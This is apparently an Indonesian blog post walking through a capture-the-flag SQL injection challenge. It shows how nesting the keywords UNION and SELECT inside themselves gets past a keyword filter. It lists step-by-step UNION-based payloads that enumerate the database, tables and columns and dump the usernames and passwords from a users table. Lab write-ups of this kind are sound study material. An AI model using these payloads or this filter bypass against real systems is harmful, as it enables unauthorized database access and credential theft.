Disoal ini saya mencoba mengetik kata UNION SELECT lalu submit dan ternyata kata tersebut tidak muncul, lalu saya yakin bahwa kata UNION dan SELECT difilter sehingga saya tidak bisa menggunakannya, namun tidak semudah itu ferguso.
banyak jalan menuju roma, jadi saya mencoba mengakalinya dengan merubah UNION menjadi UNIOunionN dan SELECT menjadi SELEselectCT, nanti otomatis akan menfilter menjadi union select.
langsung saya inject dengan Query " ' OR 1 UNIOunionN SELEselectCT 1,2,3,-- ", kenapa saya 1,2,3? karena jumlah kolumnnya ada 3 jadi silahkan anda coba mulai dari 1 untuk menemukan jumlah column yang tepat.
lalu saya melakukan checking database dan user dengan Query " ' OR 1 UNIOunionN SELEselectCT database(),2,user()-- ".
selanjutnya saya mencari list tablenya dengan menggunakan Query " ' OR 1 UNIOunionN SELECselectT 1,2,group_concat(table_name) FROM information_schema.tables WHERE table_schema=database()-- " dan list tablenya pun saya dapatkan.
kemudian mencari kolumn yang terdapat pada salah satu table, saya pakai table users dengan Query " ' OR 1 UNIOunionN SELECselectT 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_name = 'users'-- " dan saya mendapatkan 2 column pada table users.
selanjutnya saya dump kolumn username dan password dengan Query " ' OR 1 UNIOunionN SELECselectT 1,username,password FROM users-- " flag pun muncul dan ternyata flag terdapat pada table users column password.
No comments:
Post a Comment